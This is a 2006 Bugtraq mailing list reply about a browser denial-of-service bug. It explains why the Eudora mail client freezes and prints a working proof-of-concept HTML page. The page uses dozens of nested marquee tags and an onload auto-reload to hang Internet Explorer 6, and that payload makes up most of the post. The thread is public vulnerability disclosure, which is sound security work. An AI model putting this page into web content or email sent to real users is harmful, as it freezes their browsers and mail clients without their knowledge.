Bugtraq mailing list archives
RE: Fire fox dos exploit
From: Jaroslaw Sajko <sloik () parareal net>
Date: Wed, 07 Jun 2006 12:43:34 +0200
Dnia 05-06-2006, pon o godzinie 09:19 +0530, Sanjay Rawat napisaĆ(a):
I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to open the original mail in Eudora mail client and whenever I clicked on the the mail , Eudora stopped responding anymore. I had to restart the application. regards -Sanjay Rawat
Yes, it's because Eudora uses Internet_Explorer_Server component to display the content of the email. And the previously mentioned DoS case with the nested <marquee> tags concerns the Internet Explorer as well. If you want to trigger this DoS under the IExplorer you have to include <style></style> tags in the two separate lines and you have to refresh the page, only second page fetch freezes the browser. Tested on 6.0.2900.2180 XPSP2 Example is here: --[cut]-- <html> <head> <style> </style> </head> <body onload="javascript:window.location.reload(false)"> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </body> </html> --[/cut]-- regards, Jarek Sajko
Current thread:
- Re: Fire fox dos exploit pagvac (Jun 04)
- <Possible follow-ups>
- RE: Fire fox dos exploit Andy (Jun 04)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- RE: Fire fox dos exploit Jaroslaw Sajko (Jun 07)
- RE: Fire fox dos exploit Sanjay Rawat (Jun 05)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Yannick von Arx (Jun 04)
- Re: Re: Fire fox dos exploit vincenzo . ampolo (Jun 04)
- Re: Fire fox dos exploit Phil Trainor (Jun 04)
- Re: Fire fox dos exploit Ronald van den Blink (Jun 04)
- Re: Fire fox dos exploit Aaron Hopkins (Jun 04)
- Re: Re: Fire fox dos exploit al4321 (Jun 07)